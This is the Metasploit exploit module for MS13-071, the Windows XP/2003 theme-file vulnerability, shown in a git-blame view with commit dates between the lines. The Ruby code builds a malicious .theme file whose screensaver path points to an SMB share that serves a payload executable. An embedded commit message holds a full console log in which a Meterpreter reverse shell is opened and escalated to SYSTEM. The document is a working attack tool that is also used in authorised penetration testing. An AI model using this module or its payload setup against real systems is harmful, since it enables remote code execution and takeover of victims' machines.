metasploit-framework/modules/exploits/windows/fileformat/ms13_071_theme.rb

117 lines
3.6 KiB
Ruby
Raw Normal View History

2013-09-18 18:40:35 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2013-09-18 18:40:35 +00:00
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Remote
2013-09-18 18:40:35 +00:00
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share
2013-09-18 18:40:35 +00:00
def initialize(info={})
super(update_info(info,
'Name' => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",
'Description' => %q{
This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows
2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]
section. An arbitrary path can be used as screen saver, including a remote SMB resource,
which allows for remote code execution when a malicious .theme file is opened, and the
2013-09-23 18:48:23 +00:00
"Screen Saver" tab is viewed. The code execution is also triggered if the victim installs
2013-09-22 02:22:34 +00:00
the malicious theme and stays away from the computer, when Windows tries to display the
screensaver.
2013-09-18 18:40:35 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'Eduardo Prado', # Vulnerability discovery
Refactor ms13_071_theme to utilise `Msf::Exploit::Remote::SMBFileServer` This commit refactors the ms13_071_theme module written by @jvazques-r7 to utilise the Rex SMBFileServer protocol and remove duplicate code from Metasploit. ``` [*] Processing test3.msf for ERB directives. resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme resource (test3.msf)> set VERBOSE true VERBOSE => true resource (test3.msf)> set SHARE share SHARE => share resource (test3.msf)> set SCR exploit.scr SCR => exploit.scr resource (test3.msf)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (test3.msf)> set LHOST 172.32.255.1 LHOST => 172.32.255.1 resource (test3.msf)> set SRVHOST 172.32.255.1 SRVHOST => 172.32.255.1 resource (test3.msf)> set LPORT 4444 LPORT => 4444 resource (test3.msf)> exploit [*] Started reverse handler on 172.32.255.1:4444 [*] Generating our malicious executable... [*] Creating 'msf.theme' file ... [+] msf.theme stored at /root/.msf4/local/msf.theme [+] Let your victim open msf.theme [*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr [*] Starting SMB Server on 172.32.255.1:445 [*] Sending stage (769536 bytes) to 172.32.255.129 [*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100 meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` 1. use exploits/windows/fileformat/ms13_071_theme 2. set payload windows/meterpreter/reverse_tcp 3. set LHOST 4. set SRVHOST 5. exploit 6. Copy msf.theme to target 7. Open theme and navigate to "Screensaver" tab 8. Enjoy shells - [ ] Land #3074 - [ ] Land #3075 - [ ] Run exploits/windows/fileformat/ms13_071_theme - [ ] Let target open malicious msf.theme file * Windows XP SP3
2014-04-30 11:14:58 +00:00
'juan vazquez', # Metasploit module
2015-03-04 16:33:57 +00:00
'Matthew Hall <hallm@sec-1.com>' # Metasploit module refactored to use Msf::Exploit::Remote::SMB::Server::Share
2013-09-18 18:40:35 +00:00
],
'References' =>
[
['CVE', '2013-0810'],
['OSVDB', '97136'],
2013-09-18 18:40:35 +00:00
['MSB', 'MS13-071'],
2013-09-22 02:22:34 +00:00
['BID', '62176'],
['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/25/change-the-theme-get-a-shell']
2013-09-18 18:40:35 +00:00
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
2013-09-18 18:40:35 +00:00
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP3 / Windows 2003 SP2', {}],
],
'Privileged' => false,
'DisclosureDate' => "Sep 10 2013",
'DefaultTarget' => 0))
2015-03-04 16:46:34 +00:00
register_options(
2013-09-18 18:40:35 +00:00
[
2015-03-04 16:46:34 +00:00
OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']),
OptString.new('FILE_NAME', [ false, 'SCR File name to share', 'msf.scr'])
2013-09-18 18:40:35 +00:00
], self.class)
2015-03-04 16:46:34 +00:00
deregister_options('FOLDER_NAME')
2015-03-04 16:46:34 +00:00
deregister_options('FILE_CONTENTS')
2013-09-18 18:40:35 +00:00
end
2015-03-04 16:46:34 +00:00
def primer
self.file_contents = generate_payload_exe
print_status("Malicious SCR available on #{unc}...")
2015-03-04 16:33:57 +00:00
2013-09-18 18:40:35 +00:00
# Default Windows XP / 2003 theme modified
2015-03-04 16:33:57 +00:00
print_status("Creating '#{datastore['FILENAME']}' file ...")
2013-09-18 18:40:35 +00:00
theme = <<-EOF
2013-09-23 19:22:11 +00:00
; Copyright (c) Microsoft Corp. 1995-2001
2013-09-18 18:40:35 +00:00
[Theme]
DisplayName=@themeui.dll,-2016
; My Computer
[CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon]
DefaultValue=%WinDir%explorer.exe,0
; My Documents
[CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon]
DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0
; My Network Places
[CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon]
DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17
; Recycle Bin
[CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon]
full=%WinDir%SYSTEM32\\shell32.dll,32
empty=%WinDir%SYSTEM32\\shell32.dll,31
[Control Panel\\Desktop]
Wallpaper=
TileWallpaper=0
WallpaperStyle=2
Pattern=
ScreenSaveActive=0
[boot]
2015-03-04 16:33:57 +00:00
SCRNSAVE.EXE=#{unc}
2013-09-18 18:40:35 +00:00
[MasterThemeSelector]
MTSM=DABJDKT
EOF
file_create(theme)
end
end